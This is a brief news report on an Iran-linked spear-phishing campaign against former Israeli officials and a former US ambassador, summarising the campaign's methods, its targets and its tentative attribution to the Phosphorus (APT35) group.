A group of hackers who are possibly affiliated with Iran have been running a spear-phishing campaign that includes several key officials. According to reports, the Iranian hackers impersonated a former US ambassador in order to target the chairperson of a major think tank.
The hackers were able to gain access to one of the two targets' email boxes—the study does not specify which one—and then impersonate the US ambassador by following a genuine email thread the pair had two weeks prior.
Who were the targets?
- The hackers’ target list includes former Israeli officials, high-ranking military personnel, the head of a leading security think tank, and the former U.S. ambassador to Israel.
- The targets in this campaign included: Tzipi Livni, a former Israeli foreign minister and deputy prime minister, an unnamed former Israeli major general, a member of one of Israel’s leading security think tanks, a senior executive in the Israeli defense industry, a former member of a well known Middle East research center and an unnamed former U.S. ambassador to Israel.
What’s the hacking campaign all about?
The campaign includes spear phishing using both legitimate and phony email accounts, a bogus URL shortener, and a credential-harvesting Yahoo-themed phishing page.
- The campaign also used a legitimate document verification service to obtain targets' ID or passport scans.
- One part of the campaign included a credential-stealing page mocked up as an invite to a “Skier’s Roundtable.”
- Researchers noted that the hacking campaign could have been merely a form designed to steal credentials.
Who is behind these attacks?
- Reports in Israel also speculate that the campaign could be the work of Phosphorus, a prolific Iranian government-connected cyber-espionage group also known as APT35, Newscaster Team, Charming Kitten, or Magic Hound.
- The partial attribution is based on the campaign’s prime targets, an Iranian-IP address in the source code of the Yahoo phishing page and old, commented-out code (code that’s there, but not being acted on or run) from a Phosphorus campaign analyzed by Microsoft in 2020.
Final comments
The exposed spear-phishing infrastructure focuses attention on high-ranking Israeli officials in the midst of escalating tensions between Israel and Iran.
Publisher
/https://cyware-ent.s3.amazonaws.com/image_bank/713d_shutterstock_1077998936.jpg)
/https://cyware-ent.s3.amazonaws.com/image_bank/e3e2_shutterstock_290956070.jpg)
